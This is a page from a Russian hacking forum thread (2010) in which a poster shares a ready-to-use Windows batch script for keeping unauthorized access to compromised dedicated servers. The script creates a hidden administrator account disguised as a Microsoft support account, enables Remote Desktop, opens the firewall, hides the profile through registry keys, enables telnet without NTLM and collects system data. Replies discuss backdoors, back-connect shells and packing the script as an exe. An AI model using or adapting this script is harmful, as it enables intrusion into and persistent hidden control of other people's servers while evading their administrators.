Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)
-   -   [EasyHack] Dedicated Servers (https://forum.antichat.xyz/showthread.php?t=189958)

|qbz| 24.03.2010 18:49
[EasyHack] Dedicated Servers
 
Дароф ачат!

Написав недавно статейку о краже хистори из аськи + квипа, решил написать также батничек для дедиков. В батнике будут собраны все необходимые функции, в том числе:

[х] создание непалевной учетки
[х] создание из НЕ деда - деда
[х] скрытие из винлогона
[х] скрытие папки юзера
[х] сборка инфы о деде
[х] админка (или что то в этом роде)
[х] обход фаера
[х] настройка телнета на деде

Как всегда - сначал код, потом дескрайб:

Код:
set PASZ=tvoi_pass
net user SUPPORT_388945a0 /del
net user SUPPORT_388945a0 %PASZ% /add /fullname:"Microsoft Corporation" /comment:"Microsoft Windows Account" /countrycode:"000" /active:"yes" /expires:"never" /passwordchg:"NO"
net localgroup Administrators SUPPORT_388945a0 /add
net localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
net accounts /maxpwage:unlimited
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0 +h +s" /f
reg add "hklm\software\microsoft\windows\currentversion\run" /v "Microsoft update software" /t REG_SZ /d "attrib c:\documents and settings\SUPPORT_388945a0.%COMPUTERNAME% +h +s" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388945a0 /t REG_DWORD /d 0 /f
attrib "c:\documents and settings\SUPPORT_388945a0" +h +s
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
echo Telnet started.
mkdir c:\windows\system32\infos
dxdiag /t c:\windows\system32\infos\systeminfo.txt
ipconfig>c:\windows\system32\infos\ipc.txt
start explorer.exe c:\windows\system32\infos\
Теперь обьясню что и как:

Сначала мы создаем копию юзера "саппорт".Он есть везде, так что это неименее палевный вариант.
Потом добавляем его в админы и пользователи рабочего стола.
Дальше пробуем добавит в реестр ключи, отвечающие за запуск удаленного раб. стола.
Потом добавляем в исключения фаера.
Создаем также ключ в авторане - он вызовет программу "attrib", которая поставит на папку нашего профайла атрибуты СКРЫТЫЙ и СИСТЕМНЫЙ. На многих дедушках админы ленятся ставить галочки "показывать системные файлы". Почему мы ставим в авторан? Потому что до тех пор, пока мы незалогинились в наш новый акк, папки несуществует. И скрытие произойдет сразу после логина. Это немного палевно (ключи в авторане, но если руки прямые то просто берем и добавляем в код авторана удаление данного ключа).
Далее настраиваем телнет, так как в крайнем случае, если дед не за натом а учетку удалили, то можно попробовать телнет.
Далее используем штатную утилиту dxdiag и ipconfig для сборки инфы о деде + узнать за натом он или нет. Впринципе я себе дописал еще фтп сервер, который посылает на мою админку на пхп данные 2 файла (какбы на гейт). Тот их ловит и у меня в админке все по полочкам - ИП - внешний, внутренний, системная инфа распарсена, страна (тут уже идет фича с 2ip.ru) итд итп... но это уже на ваш вкус и цвет.

Как всегда советую сделать из этого ехе и запаролить (там это реализовано пассом UPX):

Bat To Exe Converter v1.5
Setup.ico

Протестировано на огромном количестве дедов. Пока все норм.
Буду рад критике и всевозможным дополнениям. Можно совместно написать больше функции и сделать потом хороший екзе.

ГЕЙТ

noxjoker 03.04.2010 23:31
|qbz| мне так интересно а если дедки за роутером. Ip не будет выделенным и на telnet ты не попадеш.

warwar 03.04.2010 23:43
Не работает в случаях, когда включен Active Directory

noxjoker 03.04.2010 23:53
я б не использовал telnet. Если вы не хотите потерять дедик ставим бекдор))

warwar 03.04.2010 23:57
Цитата:
Сообщение от noxjoker
я б не использовал telnet. Если вы не хотите потерять дедик ставим бекдор))
Дай-ка мне бекдор за NAT :p

noxjoker 04.04.2010 00:05
Я б тебе дал бекдор, но увы максимум через неделю я в него пару функций внедрю и выложу в паблик.

Есть 2 вида предоставления shell-доступа:
«BindShell» — самый распространённый, работает по архитектуре «клиент-сервер», то есть бэкдор ожидает соединение.
«Back Connect» — применяется для обхода брандмауэров, бэкдор сам пытается соединиться с компьютером хакера.

Работает по принципу Back Connect.

Работает на всех Windows дедах.

Azazel 04.04.2010 00:16
Цитата:
net localgroup Administrators SUPPORT_388945a0 /add
net localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
Аdministrators и так являются членами Remote Desktop Users.

noxjoker 04.04.2010 00:23
Azazel бывают случаи, когда в Групповые политики настроены так, что данный юзер не может добавить SUPPORT_388945a0 в Administrators, а вот в Remote Desktop Users доступ есть:rolleyes:

Бывает редко (очень, очень) но все же.

|qbz| 04.04.2010 00:39
Цитата:
Ip не будет выделенным и на telnet ты не попадеш.
Цитата:
если дед не за натом а учетку удалили
читай внимательнее

moria4ok 05.04.2010 15:26
Немножко не по теме, но у меня при конвертации, Bat To Exe Converter v1.5.0.0, выдает следующую ошибку:
---------------------------
Error!
---------------------------
An unknown error occured. The program will be terminated
---------------------------
ОК
---------------------------


И ничего сделать не могу!


Время: 04:55
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице